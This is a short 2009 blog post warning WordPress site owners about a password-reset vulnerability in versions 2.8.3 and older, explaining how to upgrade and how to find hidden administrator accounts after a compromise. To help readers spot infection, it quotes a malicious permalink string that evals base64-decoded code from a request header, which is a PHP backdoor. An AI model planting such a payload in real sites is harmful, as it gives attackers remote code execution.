Wordpress is under attack!
There was a security vulnerability that was discovered August 10, 2009 for Wordpress versions 2.8.3 and older and the patch for it was released August 11, 2009. If you are running version 2.8.4 or higher then you’re safe. This vulnerability allows someone with a specially crafted URL to reset the password of the first user in the database (typically the admin account) bypassing Wordpress’ security. This is a serious issue and you should update to the latest version of Wordpress immediately!!!
How do I upgrade my version of Wordpress?
Since Wordpress version 2.7 there is a built-in automatic upgrade feature that can be found a couple of ways. First and most obvious is on the dashboard. On the home admin page of Wordpress it displays the version of Wordpress that you are currently using and an option to upgrade if there is a newer version. Second, click on the tools option on the left-hand side and then choose upgrade. If you are running an older version than 2.7, which does not have the automatic upgrade feature, then read this. Please don’t wait, upgrade immediately.
How can I tell if I’ve been hacked?
If the permalinks to your posts look like:
or
/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
you’ve been hacked!
What do I do if my Wordpress site has been hacked?
First, upgrade Wordpress to the latest version. Then, find if there are any “hidden” administrators. If you don’t have lots of registered users the easiest way to find users is in the table “wp_users” (assuming you used the default “wp_” during Wordpress install) in your Wordpress database. To validate that the user you found has admin rights take the number from the “id” column in your “wp_users” and then look for this id in the “wp_usermeta” and match it to the “meta_key” column. If the “meta_value” contains administrator, then this user has administrator rights to your Wordpress blog.
I found another great article from Journey etc explaining a different way to find a hidden user.
Then, update your permalinks back to the way they were. This should get your site functional again. However, since you’ve been hacked and administrative rights have been compromised, I suggest you keep looking for other pieces of code that may have been inserted.
I also read a great article about this at Lorelle on Wordpress.
Filed Under: Wordpress
[...] First, how do you know that you’re affected? Here’s how you can tell that you’ve been hacked. [...]